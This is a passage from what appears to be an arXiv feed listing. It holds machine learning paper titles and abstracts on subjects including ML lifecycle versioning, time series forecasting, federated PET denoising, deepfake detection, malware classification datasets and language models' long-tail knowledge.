    An end-to-end machine learning (ML) lifecycle consists of many iterative processes, from data preparation and ML model design to model training and then deploying the trained model for inference. When building an end-to-end lifecycle for an ML problem, many ML pipelines must be designed and executed that produce a huge number of lifecycle versions. Therefore, this paper introduces VeML, a Version management system dedicated to end-to-end ML Lifecycle. Our system tackles several crucial problems that other systems have not solved. First, we address the high cost of building an ML lifecycle, especially for large-scale and high-dimensional dataset. We solve this problem by proposing to transfer the lifecycle of similar datasets managed in our system to the new training data. We design an algorithm based on the core set to compute similarity for large-scale, high-dimensional data efficiently. Another critical issue is the model accuracy degradation by the difference between training data and testing data during the ML lifetime, which leads to lifecycle rebuild. Our system helps to detect this mismatch without getting labeled data from testing data and rebuild the ML lifecycle for a new data version. To demonstrate our contributions, we conduct experiments on real-world, large-scale datasets of driving images and spatiotemporal sensor data and show promising results.
    Differential Convolutional Fuzzy Time Series Forecasting. (arXiv:2305.08890v2 [cs.LG] UPDATED)
    Fuzzy time series forecasting (FTSF) is a typical forecasting method with wide application. Traditional FTSF is regarded as an expert system which leads to loss of the ability to recognize undefined features. The mentioned is the main reason for poor forecasting with FTSF. To solve the problem, the proposed model Differential Fuzzy Convolutional Neural Network (DFCNN) utilizes a convolution neural network to re-implement FTSF with learnable ability. DFCNN is capable of recognizing potential information and improving forecasting accuracy. Thanks to the learnable ability of the neural network, the length of fuzzy rules established in FTSF is expended to an arbitrary length that the expert is not able to handle by the expert system. At the same time, FTSF usually cannot achieve satisfactory performance of non-stationary time series due to the trend of non-stationary time series. The trend of non-stationary time series causes the fuzzy set established by FTSF to be invalid and causes the forecasting to fail. DFCNN utilizes the Difference algorithm to weaken the non-stationary of time series so that DFCNN can forecast the non-stationary time series with a low error that FTSF cannot forecast in satisfactory performance. After the mass of experiments, DFCNN has an excellent prediction effect, which is ahead of the existing FTSF and common time series forecasting algorithms. Finally, DFCNN provides further ideas for improving FTSF and holds continued research value.
    Harnessing Synthetic Active Particles for Physical Reservoir Computing. (arXiv:2307.15010v1 [cond-mat.soft])
    The processing of information is an indispensable property of living systems realized by networks of active processes with enormous complexity. They have inspired many variants of modern machine learning one of them being reservoir computing, in which stimulating a network of nodes with fading memory enables computations and complex predictions. Reservoirs are implemented on computer hardware, but also on unconventional physical substrates such as mechanical oscillators, spins, or bacteria often summarized as physical reservoir computing. Here we demonstrate physical reservoir computing with a synthetic active microparticle system that self-organizes from an active and passive component into inherently noisy nonlinear dynamical units. The self-organization and dynamical response of the unit is the result of a delayed propulsion of the microswimmer to a passive target. A reservoir of such units with a self-coupling via the delayed response can perform predictive tasks despite the strong noise resulting from Brownian motion of the microswimmers. To achieve efficient noise suppression, we introduce a special architecture that uses historical reservoir states for output. Our results pave the way for the study of information processing in synthetic self-organized active particle systems.
    FedFTN: Personalized Federated Learning with Deep Feature Transformation Network for Multi-institutional Low-count PET Denoising. (arXiv:2304.00570v2 [eess.IV] UPDATED)
    Low-count PET is an efficient way to reduce radiation exposure and acquisition time, but the reconstructed images often suffer from low signal-to-noise ratio (SNR), thus affecting diagnosis and other downstream tasks. Recent advances in deep learning have shown great potential in improving low-count PET image quality, but acquiring a large, centralized, and diverse dataset from multiple institutions for training a robust model is difficult due to privacy and security concerns of patient data. Moreover, low-count PET data at different institutions may have different data distribution, thus requiring personalized models. While previous federated learning (FL) algorithms enable multi-institution collaborative training without the need of aggregating local data, addressing the large domain shift in the application of multi-institutional low-count PET denoising remains a challenge and is still highly under-explored. In this work, we propose FedFTN, a personalized federated learning strategy that addresses these challenges. FedFTN uses a local deep feature transformation network (FTN) to modulate the feature outputs of a globally shared denoising network, enabling personalized low-count PET denoising for each institution. During the federated learning process, only the denoising network's weights are communicated and aggregated, while the FTN remains at the local institutions for feature transformation. We evaluated our method using a large-scale dataset of multi-institutional low-count PET imaging data from three medical centers located across three continents, and showed that FedFTN provides high-quality low-count PET images, outperforming previous baseline FL reconstruction methods across all low-count levels at all three institutions.
    Learning a Generic Value-Selection Heuristic Inside a Constraint Programming Solver. (arXiv:2301.01913v2 [cs.AI] UPDATED)
    Constraint programming is known for being an efficient approach for solving combinatorial problems. Important design choices in a solver are the branching heuristics, which are designed to lead the search to the best solutions in a minimum amount of time. However, developing these heuristics is a time-consuming process that requires problem-specific expertise. This observation has motivated many efforts to use machine learning to automatically learn efficient heuristics without expert intervention. To the best of our knowledge, it is still an open research question. Although several generic variable-selection heuristics are available in the literature, the options for a generic value-selection heuristic are more scarce. In this paper, we propose to tackle this issue by introducing a generic learning procedure that can be used to obtain a value-selection heuristic inside a constraint programming solver. This has been achieved thanks to the combination of a deep Q-learning algorithm, a tailored reward signal, and a heterogeneous graph neural network architecture. Experiments on graph coloring, maximum independent set, and maximum cut problems show that our framework is able to find better solutions close to optimality without requiring a large amounts of backtracks while being generic.
    Causal Lifting and Link Prediction. (arXiv:2302.01198v2 [cs.LG] UPDATED)
    Existing causal models for link prediction assume an underlying set of inherent node factors -- an innate characteristic defined at the node's birth -- that governs the causal evolution of links in the graph. In some causal tasks, however, link formation is path-dependent: The outcome of link interventions depends on existing links. Unfortunately, these existing causal methods are not designed for path-dependent link formation, as the cascading functional dependencies between links (arising from path dependence) are either unidentifiable or require an impractical number of control variables. To overcome this, we develop the first causal model capable of dealing with path dependencies in link prediction. In this work we introduce the concept of causal lifting, an invariance in causal models of independent interest that, on graphs, allows the identification of causal link prediction queries using limited interventional data. Further, we show how structural pairwise embeddings exhibit lower bias and correctly represent the task's causal structure, as opposed to existing node embeddings, e.g., graph neural network node embeddings and matrix factorization. Finally, we validate our theoretical findings on three scenarios for causal link prediction tasks: knowledge base completion, covariance matrix estimation and consumer-product recommendations.
    Algorithmic Hallucinations of Near-Surface Winds: Statistical Downscaling with Generative Adversarial Networks to Convection-Permitting Scales. (arXiv:2302.08720v2 [physics.ao-ph] UPDATED)
    This paper explores the application of emerging machine learning methods from image super-resolution (SR) to the task of statistical downscaling. We specifically focus on convolutional neural network-based Generative Adversarial Networks (GANs). Our GANs are conditioned on low-resolution (LR) inputs to generate high-resolution (HR) surface winds emulating Weather Research and Forecasting (WRF) model simulations over North America. Unlike traditional SR models, where LR inputs are idealized coarsened versions of the HR images, WRF emulation involves using non-idealized LR and HR pairs resulting in shared-scale mismatches due to internal variability. Our study builds upon current SR-based statistical downscaling by experimenting with a novel frequency-separation (FS) approach from the computer vision field. To assess the skill of SR models, we carefully select evaluation metrics, and focus on performance measures based on spatial power spectra. Our analyses reveal how GAN configurations influence spatial structures in the generated fields, particularly biases in spatial variability spectra. Using power spectra to evaluate the FS experiments reveals that successful applications of FS in computer vision do not translate to climate fields. However, the FS experiments demonstrate the sensitivity of power spectra to a commonly used GAN-based SR objective function, which helps interpret and understand its role in determining spatial structures. This result motivates the development of a novel partial frequency-separation scheme as a promising configuration option. We also quantify the influence on GAN performance of non-idealized LR fields resulting from internal variability. Furthermore, we conduct a spectra-based feature-importance experiment allowing us to explore the dependence of the spatial structure of generated fields on different physically relevant LR covariates.
    Trace Recovery from Stochastically Known Logs. (arXiv:2206.12672v2 [cs.LG] UPDATED)
    In this work we propose an algorithm for trace recovery from stochastically known logs, a setting that is becoming more common with the increasing number of sensors and predictive models that generate uncertain data. The suggested approach calculates the conformance between a process model and a stochastically known trace and recovers the best alignment within this stochastic trace as the true trace. The paper offers an analysis of the impact of various cost models on trace recovery accuracy and makes use of a product multi-graph to compare alternative trace recovery options. The average accuracy of our approach, evaluated using two publicly available datasets, is impressive, with an average recovery accuracy score of 90-97%, significantly improving a common heuristic that chooses the most likely value for each uncertain activity. We believe that the effectiveness of the proposed algorithm in recovering correct traces from stochastically known logs may be a powerful aid for developing credible decision-making tools in uncertain settings.
    Exploring Weight Balancing on Long-Tailed Recognition Problem. (arXiv:2305.16573v4 [cs.LG] UPDATED)
    Recognition problems in long-tailed data, where the sample size per class is heavily skewed, have recently gained importance because the distribution of the sample size per class in a dataset is generally exponential unless the sample size is intentionally adjusted. Various approaches have been devised to address these problems. Recently, weight balancing, which combines well-known classical regularization techniques with two-stage training, has been proposed. Despite its simplicity, it is known for its high performance against existing methods devised in various ways. However, there is a lack of understanding as to why this approach is effective for long-tailed data. In this study, we analyze the method focusing on neural collapse and cone effect at each training stage and find that it can be decomposed into the increase in Fisher's discriminant ratio of the feature extractor caused by weight decay and cross entropy loss and implicit logit adjustment caused by weight decay and class-balanced loss. Our analysis shows that the training method can be further simplified by reducing the number of training stages to one while increasing accuracy.
    Self-Supervised Graph Transformer for Deepfake Detection. (arXiv:2307.15019v1 [cs.CV])
    Deepfake detection methods have shown promising results in recognizing forgeries within a given dataset, where training and testing take place on the in-distribution dataset. However, their performance deteriorates significantly when presented with unseen samples. As a result, a reliable deepfake detection system must remain impartial to forgery types, appearance, and quality for guaranteed generalizable detection performance. Despite various attempts to enhance cross-dataset generalization, the problem remains challenging, particularly when testing against common post-processing perturbations, such as video compression or blur. Hence, this study introduces a deepfake detection framework, leveraging a self-supervised pre-training model that delivers exceptional generalization ability, withstanding common corruptions and enabling feature explainability. The framework comprises three key components: a feature extractor based on vision Transformer architecture that is pre-trained via self-supervised contrastive learning methodology, a graph convolution network coupled with a Transformer discriminator, and a graph Transformer relevancy map that provides a better understanding of manipulated regions and further explains the model's decision. To assess the effectiveness of the proposed framework, several challenging experiments are conducted, including in-data distribution performance, cross-dataset, cross-manipulation generalization, and robustness against common post-production perturbations. The results achieved demonstrate the remarkable effectiveness of the proposed deepfake detection framework, surpassing the current state-of-the-art approaches.
    Speeding up Fourier Neural Operators via Mixed Precision. (arXiv:2307.15034v1 [cs.LG])
    The Fourier neural operator (FNO) is a powerful technique for learning surrogate maps for partial differential equation (PDE) solution operators. For many real-world applications, which often require high-resolution data points, training time and memory usage are significant bottlenecks. While there are mixed-precision training techniques for standard neural networks, those work for real-valued datatypes on finite dimensions and therefore cannot be directly applied to FNO, which crucially operates in the (complex-valued) Fourier domain and in function spaces. On the other hand, since the Fourier transform is already an approximation (due to discretization error), we do not need to perform the operation at full precision. In this work, we (i) profile memory and runtime for FNO with full and mixed-precision training, (ii) conduct a study on the numerical stability of mixed-precision training of FNO, and (iii) devise a training routine which substantially decreases training time and memory usage (up to 34%), with little or no reduction in accuracy, on the Navier-Stokes and Darcy flow equations. Combined with the recently proposed tensorized FNO (Kossaifi et al., 2023), the resulting model has far better performance while also being significantly faster than the original FNO.
    Large Language Models Struggle to Learn Long-Tail Knowledge. (arXiv:2211.08411v2 [cs.CL] UPDATED)
    The Internet contains a wealth of knowledge -- from the birthdays of historical figures to tutorials on how to code -- all of which may be learned by language models. However, while certain pieces of information are ubiquitous on the web, others appear extremely rarely. In this paper, we study the relationship between the knowledge memorized by large language models and the information in pre-training datasets scraped from the web. In particular, we show that a language model's ability to answer a fact-based question relates to how many documents associated with that question were seen during pre-training. We identify these relevant documents by entity linking pre-training datasets and counting documents that contain the same entities as a given question-answer pair. Our results demonstrate strong correlational and causal relationships between accuracy and relevant document count for numerous question answering datasets (e.g., TriviaQA), pre-training corpora (e.g., ROOTS), and model sizes (e.g., 176B parameters). Moreover, while larger models are better at learning long-tail knowledge, we estimate that today's models must be scaled by many orders of magnitude to reach competitive QA performance on questions with little support in the pre-training data. Finally, we show that retrieval-augmentation can reduce the dependence on relevant pre-training information, presenting a promising approach for capturing the long-tail.
    Analyzing Explainer Robustness via Lipschitzness of Prediction Functions. (arXiv:2206.12481v2 [cs.LG] UPDATED)
    Machine learning methods have significantly improved in their predictive capabilities, but at the same time they are becoming more complex and less transparent. As a result, explainers are often relied on to provide interpretability to these black-box prediction models. As crucial diagnostics tools, it is important that these explainers themselves are robust. In this paper we focus on one particular aspect of robustness, namely that an explainer should give similar explanations for similar data inputs. We formalize this notion by introducing and defining explainer astuteness, analogous to astuteness of prediction functions. Our formalism allows us to connect explainer robustness to the predictor's probabilistic Lipschitzness, which captures the probability of local smoothness of a function. We provide lower bound guarantees on the astuteness of a variety of explainers (e.g., SHAP, RISE, CXPlain) given the Lipschitzness of the prediction function. These theoretical results imply that locally smooth prediction functions lend themselves to locally robust explanations. We evaluate these results empirically on simulated as well as real datasets.
    Predicting Winning Regions in Parity Games via Graph Neural Networks (Extended Abstract). (arXiv:2210.09924v2 [cs.GT] UPDATED)
    Solving parity games is a major building block for numerous applications in reactive program verification and synthesis. While they can be solved efficiently in practice, no known approach has a polynomial worst-case runtime complexity. We present a incomplete polynomial-time approach to determining the winning regions of parity games via graph neural networks. Our evaluation on 900 randomly generated parity games shows that this approach is effective and efficient in practice. It correctly determines the winning regions of $\sim$60\% of the games in our data set and only incurs minor errors in the remaining ones. We believe that this approach can be extended to efficiently solve parity games as well.
    Securing Secure Aggregation: Mitigating Multi-Round Privacy Leakage in Federated Learning. (arXiv:2106.03328v2 [cs.LG] UPDATED)
    Secure aggregation is a critical component in federated learning (FL), which enables the server to learn the aggregate model of the users without observing their local models. Conventionally, secure aggregation algorithms focus only on ensuring the privacy of individual users in a single training round. We contend that such designs can lead to significant privacy leakages over multiple training rounds, due to partial user selection/participation at each round of FL. In fact, we show that the conventional random user selection strategies in FL lead to leaking users' individual models within number of rounds that is linear in the number of users. To address this challenge, we introduce a secure aggregation framework, Multi-RoundSecAgg, with multi-round privacy guarantees. In particular, we introduce a new metric to quantify the privacy guarantees of FL over multiple training rounds, and develop a structured user selection strategy that guarantees the long-term privacy of each user (over any number of training rounds). Our framework also carefully accounts for the fairness and the average number of participating users at each round. Our experiments on MNIST and CIFAR-10 datasets in the IID and the non-IID settings demonstrate the performance improvement over the baselines, both in terms of privacy protection and test accuracy.
    Decoupling Knowledge from Memorization: Retrieval-augmented Prompt Learning. (arXiv:2205.14704v4 [cs.CL] UPDATED)
    Prompt learning approaches have made waves in natural language processing by inducing better few-shot performance while they still follow a parametric-based learning paradigm; the oblivion and rote memorization problems in learning may encounter unstable generalization issues. Specifically, vanilla prompt learning may struggle to utilize atypical instances by rote during fully-supervised training or overfit shallow patterns with low-shot data. To alleviate such limitations, we develop RetroPrompt with the motivation of decoupling knowledge from memorization to help the model strike a balance between generalization and memorization. In contrast with vanilla prompt learning, RetroPrompt constructs an open-book knowledge-store from training instances and implements a retrieval mechanism during the process of input, training and inference, thus equipping the model with the ability to retrieve related contexts from the training corpus as cues for enhancement. Extensive experiments demonstrate that RetroPrompt can obtain better performance in both few-shot and zero-shot settings. Besides, we further illustrate that our proposed RetroPrompt can yield better generalization abilities with new datasets. Detailed analysis of memorization indeed reveals RetroPrompt can reduce the reliance of language models on memorization; thus, improving generalization for downstream tasks. Code is available in https://github.com/zjunlp/PromptKG/tree/main/research/RetroPrompt.
    Contrastive Domain Adaptation for Time-Series via Temporal Mixup. (arXiv:2212.01555v2 [cs.LG] UPDATED)
    Unsupervised Domain Adaptation (UDA) has emerged as a powerful solution for the domain shift problem via transferring the knowledge from a labeled source domain to a shifted unlabeled target domain. Despite the prevalence of UDA for visual applications, it remains relatively less explored for time-series applications. In this work, we propose a novel lightweight contrastive domain adaptation framework called CoTMix for time-series data. Unlike existing approaches that either use statistical distances or adversarial techniques, we leverage contrastive learning solely to mitigate the distribution shift across the different domains. Specifically, we propose a novel temporal mixup strategy to generate two intermediate augmented views for the source and target domains. Subsequently, we leverage contrastive learning to maximize the similarity between each domain and its corresponding augmented view. The generated views consider the temporal dynamics of time-series data during the adaptation process while inheriting the semantics among the two domains. Hence, we gradually push both domains towards a common intermediate space, mitigating the distribution shift across them. Extensive experiments conducted on five real-world time-series datasets show that our approach can significantly outperform all state-of-the-art UDA methods. The implementation code of CoTMix is available at \href{https://github.com/emadeldeen24/CoTMix}{github.com/emadeldeen24/CoTMix}.
    Decoding the Secrets of Machine Learning in Malware Classification: A Deep Dive into Datasets, Feature Extraction, and Model Performance. (arXiv:2307.14657v1 [cs.CR])
    Many studies have proposed machine-learning (ML) models for malware detection and classification, reporting an almost-perfect performance. However, they assemble ground-truth in different ways, use diverse static- and dynamic-analysis techniques for feature extraction, and even differ on what they consider a malware family. As a consequence, our community still lacks an understanding of malware classification results: whether they are tied to the nature and distribution of the collected dataset, to what extent the number of families and samples in the training dataset influence performance, and how well static and dynamic features complement each other. This work sheds light on those open questions. by investigating the key factors influencing ML-based malware detection and classification. For this, we collect the largest balanced malware dataset so far with 67K samples from 670 families (100 samples each), and train state-of-the-art models for malware detection and family classification using our dataset. Our results reveal that static features perform better than dynamic features, and that combining both only provides marginal improvement over static features. We discover no correlation between packing and classification accuracy, and that missing behaviors in dynamically-extracted features highly penalize their performance. We also demonstrate how a larger number of families to classify make the classification harder, while a higher number of samples per family increases accuracy. Finally, we find that models trained on a uniform distribution of samples per family better generalize on unseen data.
    Learning locally dominant force balances in active particle systems. (arXiv:2307.14970v1 [cond-mat.soft])
    We use a combination of unsupervised clustering and sparsity-promoting inference algorithms to learn locally dominant force balances that explain macroscopic pattern formation in self-organized active particle systems. The self-organized emergence of macroscopic patterns from microscopic interactions between self-propelled particles can be widely observed nature. Although hydrodynamic theories help us better understand the physical basis of this phenomenon, identifying a sufficient set of local interactions that shape, regulate, and sustain self-organized structures in active particle systems remains challenging. We investigate a classic hydrodynamic model of self-propelled particles that produces a wide variety of patterns, like asters and moving density bands. Our data-driven analysis shows that propagating bands are formed by local alignment interactions driven by density gradients, while steady-state asters are shaped by a mechanism of splay-induced negative compressibility arising from strong particle interactions. Our method also reveals analogous physical principles of pattern formation in a system where the speed of the particle is influenced by local density. This demonstrates the ability of our method to reveal physical commonalities across models. The physical mechanisms inferred from the data are in excellent agreement with analytical scaling arguments and experimental observations.
    On the Generalization Effects of Linear Transformations in Data Augmentation. (arXiv:2005.00695v3 [cs.LG] UPDATED)
    Data augmentation is a powerful technique to improve performance in applications such as image and text classification tasks. Yet, there is little rigorous understanding of why and how various augmentations work. In this work, we consider a family of linear transformations and study their effects on the ridge estimator in an over-parametrized linear regression setting. First, we show that transformations that preserve the labels of the data can improve estimation by enlarging the span of the training data. Second, we show that transformations that mix data can improve estimation by playing a regularization effect. Finally, we validate our theoretical insights on MNIST. Based on the insights, we propose an augmentation scheme that searches over the space of transformations by how uncertain the model is about the transformed data. We validate our proposed scheme on image and text datasets. For example, our method outperforms random sampling methods by 1.24% on CIFAR-100 using Wide-ResNet-28-10. Furthermore, we achieve comparable accuracy to the SoTA Adversarial AutoAugment on CIFAR-10, CIFAR-100, SVHN, and ImageNet datasets.
    On (Normalised) Discounted Cumulative Gain as an Offline Evaluation Metric for Top-$n$ Recommendation. (arXiv:2307.15053v1 [cs.IR])
    Approaches to recommendation are typically evaluated in one of two ways: (1) via a (simulated) online experiment, often seen as the gold standard, or (2) via some offline evaluation procedure, where the goal is to approximate the outcome of an online experiment. Several offline evaluation metrics have been adopted in the literature, inspired by ranking metrics prevalent in the field of Information Retrieval. (Normalised) Discounted Cumulative Gain (nDCG) is one such metric that has seen widespread adoption in empirical studies, and higher (n)DCG values have been used to present new methods as the state-of-the-art in top-$n$ recommendation for many years. Our work takes a critical look at this approach, and investigates when we can expect such metrics to approximate the gold standard outcome of an online experiment. We formally present the assumptions that are necessary to consider DCG an unbiased estimator of online reward and provide a derivation for this metric from first principles, highlighting where we deviate from its traditional uses in IR. Importantly, we show that normalising the metric renders it inconsistent, in that even when DCG is unbiased, ranking competing methods by their normalised DCG can invert their relative order. Through a correlation analysis between off- and on-line experiments conducted on a large-scale recommendation platform, we show that our unbiased DCG estimates strongly correlate with online reward, even when some of the metric's inherent assumptions are violated. This statement no longer holds for its normalised variant, suggesting that nDCG's practical utility may be limited.
    Dynamics of specialization in neural modules under resource constraints. (arXiv:2106.02626v2 [q-bio.NC] UPDATED)
    It has long been believed that the brain is highly modular both in terms of structure and function, although recent evidence has led some to question the extent of both types of modularity. We used artificial neural networks to test the hypothesis that structural modularity is sufficient to guarantee functional specialization, and find that in general, this doesn't necessarily hold except at extreme levels. We then systematically tested which features of the environment and network do lead to the emergence of specialization. We used a simple toy environment, task and network, allowing us precise control, and show that in this setup, several distinct measures of specialization give qualitatively similar results. We further find that (1) specialization can only emerge in environments where features of that environment are meaningfully separable, (2) specialization preferentially emerges when the network is strongly resource-constrained, and (3) these findings are qualitatively similar across different network architectures, but the quantitative relationships depends on the architecture type. Finally, we show that functional specialization varies dynamically across time, and demonstrate that these dynamics depend on both the timing and bandwidth of information flow in the network. We conclude that a static notion of specialization, based on structural modularity, is likely too simple a framework for understanding intelligent systems in situations of real-world complexity. We propose that thoroughly stress testing candidate definitions of functional modularity in simplified scenarios before extending to more complex data, network models and electrophysiological recordings is likely to be a fruitful approach.
    Learning Task Automata for Reinforcement Learning using Hidden Markov Models. (arXiv:2208.11838v3 [cs.LG] UPDATED)
    Training reinforcement learning (RL) agents using scalar reward signals is often infeasible when an environment has sparse and non-Markovian rewards. Moreover, handcrafting these reward functions before training is prone to misspecification, especially when the environment's dynamics are only partially known. This paper proposes a novel pipeline for learning non-Markovian task specifications as succinct finite-state `task automata' from episodes of agent experience within unknown environments. We leverage two key algorithmic insights. First, we learn a product MDP, a model composed of the specification's automaton and the environment's MDP (both initially unknown), by treating the product MDP as a partially observable MDP and using the well-known Baum-Welch algorithm for learning hidden Markov models. Second, we propose a novel method for distilling the task automaton (assumed to be a deterministic finite automaton) from the learnt product MDP. Our learnt task automaton enables the decomposition of a task into its constituent sub-tasks, which improves the rate at which an RL agent can later synthesise an optimal policy. It also provides an interpretable encoding of high-level environmental and task features, so a human can readily verify that the agent has learnt coherent tasks with no misspecifications. In addition, we take steps towards ensuring that the learnt automaton is environment-agnostic, making it well-suited for use in transfer learning. Finally, we provide experimental results compared with two baselines to illustrate our algorithm's performance in different environments and tasks.
    Pruning Distorted Images in MNIST Handwritten Digits. (arXiv:2307.14343v1 [cs.CV])
    Recognizing handwritten digits is a challenging task primarily due to the diversity of writing styles and the presence of noisy images. The widely used MNIST dataset, which is commonly employed as a benchmark for this task, includes distorted digits with irregular shapes, incomplete strokes, and varying skew in both the training and testing datasets. Consequently, these factors contribute to reduced accuracy in digit recognition. To overcome this challenge, we propose a two-stage deep learning approach. In the first stage, we create a simple neural network to identify distorted digits within the training set. This model serves to detect and filter out such distorted and ambiguous images. In the second stage, we exclude these identified images from the training dataset and proceed to retrain the model using the filtered dataset. This process aims to improve the classification accuracy and confidence levels while mitigating issues of underfitting and overfitting. Our experimental results demonstrate the effectiveness of the proposed approach, achieving an accuracy rate of over 99.5% on the testing dataset. This significant improvement showcases the potential of our method in enhancing digit classification accuracy. In our future work, we intend to explore the scalability of this approach and investigate techniques to further enhance accuracy by reducing the size of the training data.
    Towards Practicable Sequential Shift Detectors. (arXiv:2307.14758v1 [cs.LG])
    There is a growing awareness of the harmful effects of distribution shift on the performance of deployed machine learning models. Consequently, there is a growing interest in detecting these shifts before associated costs have time to accumulate. However, desiderata of crucial importance to the practicable deployment of sequential shift detectors are typically overlooked by existing works, precluding their widespread adoption. We identify three such desiderata, highlight existing works relevant to their satisfaction, and recommend impactful directions for future research.
    Auto-Tables: Synthesizing Multi-Step Transformations to Relationalize Tables without Using Examples. (arXiv:2307.14565v1 [cs.DB])
    Relational tables, where each row corresponds to an entity and each column corresponds to an attribute, have been the standard for tables in relational databases. However, such a standard cannot be taken for granted when dealing with tables "in the wild". Our survey of real spreadsheet-tables and web-tables shows that over 30% of such tables do not conform to the relational standard, for which complex table-restructuring transformations are needed before these tables can be queried easily using SQL-based analytics tools. Unfortunately, the required transformations are non-trivial to program, which has become a substantial pain point for technical and non-technical users alike, as evidenced by large numbers of forum questions in places like StackOverflow and Excel/Tableau forums. We develop an Auto-Tables system that can automatically synthesize pipelines with multi-step transformations (in Python or other languages), to transform non-relational tables into standard relational forms for downstream analytics, obviating the need for users to manually program transformations. We compile an extensive benchmark for this new task, by collecting 194 real test cases from user spreadsheets and online forums. Our evaluation suggests that Auto-Tables can successfully synthesize transformations for over 70% of test cases at interactive speeds, without requiring any input from users, making this an effective tool for both technical and non-technical users to prepare data for analytics.
    Speed Limits for Deep Learning. (arXiv:2307.14653v1 [stat.ML])
    State-of-the-art neural networks require extreme computational power to train. It is therefore natural to wonder whether they are optimally trained. Here we apply a recent advancement in stochastic thermodynamics which allows bounding the speed at which one can go from the initial weight distribution to the final distribution of the fully trained network, based on the ratio of their Wasserstein-2 distance and the entropy production rate of the dynamical process connecting them. Considering both gradient-flow and Langevin training dynamics, we provide analytical expressions for these speed limits for linear and linearizable neural networks e.g. Neural Tangent Kernel (NTK). Remarkably, given some plausible scaling assumptions on the NTK spectra and spectral decomposition of the labels -- learning is optimal in a scaling sense. Our results are consistent with small-scale experiments with Convolutional Neural Networks (CNNs) and Fully Connected Neural networks (FCNs) on CIFAR-10, showing a short highly non-optimal regime followed by a longer optimal regime.
    Fair Machine Unlearning: Data Removal while Mitigating Disparities. (arXiv:2307.14754v1 [cs.LG])
    As public consciousness regarding the collection and use of personal information by corporations grows, it is of increasing importance that consumers be active participants in the curation of corporate datasets. In light of this, data governance frameworks such as the General Data Protection Regulation (GDPR) have outlined the right to be forgotten as a key principle allowing individuals to request that their personal data be deleted from the databases and models used by organizations. To achieve forgetting in practice, several machine unlearning methods have been proposed to address the computational inefficiencies of retraining a model from scratch with each unlearning request. While efficient online alternatives to retraining, it is unclear how these methods impact other properties critical to real-world applications, such as fairness. In this work, we propose the first fair machine unlearning method that can provably and efficiently unlearn data instances while preserving group fairness. We derive theoretical results which demonstrate that our method can provably unlearn data instances while maintaining fairness objectives. Extensive experimentation with real-world datasets highlight the efficacy of our method at unlearning data instances while preserving fairness.
    A Transformer-based Approach for Arabic Offline Handwritten Text Recognition. (arXiv:2307.15045v1 [cs.CV])
    Handwriting recognition is a challenging and critical problem in the fields of pattern recognition and machine learning, with applications spanning a wide range of domains. In this paper, we focus on the specific issue of recognizing offline Arabic handwritten text. Existing approaches typically utilize a combination of convolutional neural networks for image feature extraction and recurrent neural networks for temporal modeling, with connectionist temporal classification used for text generation. However, these methods suffer from a lack of parallelization due to the sequential nature of recurrent neural networks. Furthermore, these models cannot account for linguistic rules, necessitating the use of an external language model in the post-processing stage to boost accuracy. To overcome these issues, we introduce two alternative architectures, namely the Transformer Transducer and the standard sequence-to-sequence Transformer, and compare their performance in terms of accuracy and speed. Our approach can model language dependencies and relies only on the attention mechanism, thereby making it more parallelizable and less complex. We employ pre-trained Transformers for both image understanding and language modeling. Our evaluation on the Arabic KHATT dataset demonstrates that our proposed method outperforms the current state-of-the-art approaches for recognizing offline Arabic handwritten text.
    TimeGNN: Temporal Dynamic Graph Learning for Time Series Forecasting. (arXiv:2307.14680v1 [cs.LG])
    Time series forecasting lies at the core of important real-world applications in many fields of science and engineering. The abundance of large time series datasets that consist of complex patterns and long-term dependencies has led to the development of various neural network architectures. Graph neural network approaches, which jointly learn a graph structure based on the correlation of raw values of multivariate time series while forecasting, have recently seen great success. However, such solutions are often costly to train and difficult to scale. In this paper, we propose TimeGNN, a method that learns dynamic temporal graph representations that can capture the evolution of inter-series patterns along with the correlations of multiple series. TimeGNN achieves inference times 4 to 80 times faster than other state-of-the-art graph-based methods while achieving comparable forecasting performance
    Emotion4MIDI: a Lyrics-based Emotion-Labeled Symbolic Music Dataset. (arXiv:2307.14783v1 [eess.AS])
    We present a new large-scale emotion-labeled symbolic music dataset consisting of 12k MIDI songs. To create this dataset, we first trained emotion classification models on the GoEmotions dataset, achieving state-of-the-art results with a model half the size of the baseline. We then applied these models to lyrics from two large-scale MIDI datasets. Our dataset covers a wide range of fine-grained emotions, providing a valuable resource to explore the connection between music and emotions and, especially, to develop models that can generate music based on specific emotions. Our code for inference, trained models, and datasets are available online.
    Compositional federated learning: Applications in distributionally robust averaging and meta learning. (arXiv:2106.11264v3 [cs.LG] UPDATED)
    In the paper, we propose an effective and efficient Compositional Federated Learning (ComFedL) algorithm for solving a new compositional Federated Learning (FL) framework, which frequently appears in many data mining and machine learning problems with a hierarchical structure such as distributionally robust FL and model-agnostic meta learning (MAML). Moreover, we study the convergence analysis of our ComFedL algorithm under some mild conditions, and prove that it achieves a convergence rate of $O(\frac{1}{\sqrt{T}})$, where $T$ denotes the number of iteration. To the best of our knowledge, our new Compositional FL framework is the first work to bridge federated learning with composition stochastic optimization. In particular, we first transform the distributionally robust FL (i.e., a minimax optimization problem) into a simple composition optimization problem by using KL divergence regularization. At the same time, we also first transform the distribution-agnostic MAML problem (i.e., a minimax optimization problem) into a simple yet effective composition optimization problem. Finally, we apply two popular machine learning tasks, i.e., distributionally robust FL and MAML to demonstrate the effectiveness of our algorithm.
    MATNilm: Multi-appliance-task Non-intrusive Load Monitoring with Limited Labeled Data. (arXiv:2307.14778v1 [cs.LG])
    Non-intrusive load monitoring (NILM) identifies the status and power consumption of various household appliances by disaggregating the total power usage signal of an entire house. Efficient and accurate load monitoring facilitates user profile establishment, intelligent household energy management, and peak load shifting. This is beneficial for both the end-users and utilities by improving the overall efficiency of a power distribution network. Existing approaches mainly focus on developing an individual model for each appliance. Those approaches typically rely on a large amount of household-labeled data which is hard to collect. In this paper, we propose a multi-appliance-task framework with a training-efficient sample augmentation (SA) scheme that boosts the disaggregation performance with limited labeled data. For each appliance, we develop a shared-hierarchical split structure for its regression and classification tasks. In addition, we also propose a two-dimensional attention mechanism in order to capture spatio-temporal correlations among all appliances. With only one-day training data and limited appliance operation profiles, the proposed SA algorithm can achieve comparable test performance to the case of training with the full dataset. Finally, simulation results show that our proposed approach features a significantly improved performance over many baseline models. The relative errors can be reduced by more than 50\% on average. The codes of this work are available at https://github.com/jxiong22/MATNilm
    Scaling Session-Based Transformer Recommendations using Optimized Negative Sampling and Loss Functions. (arXiv:2307.14906v1 [cs.IR])
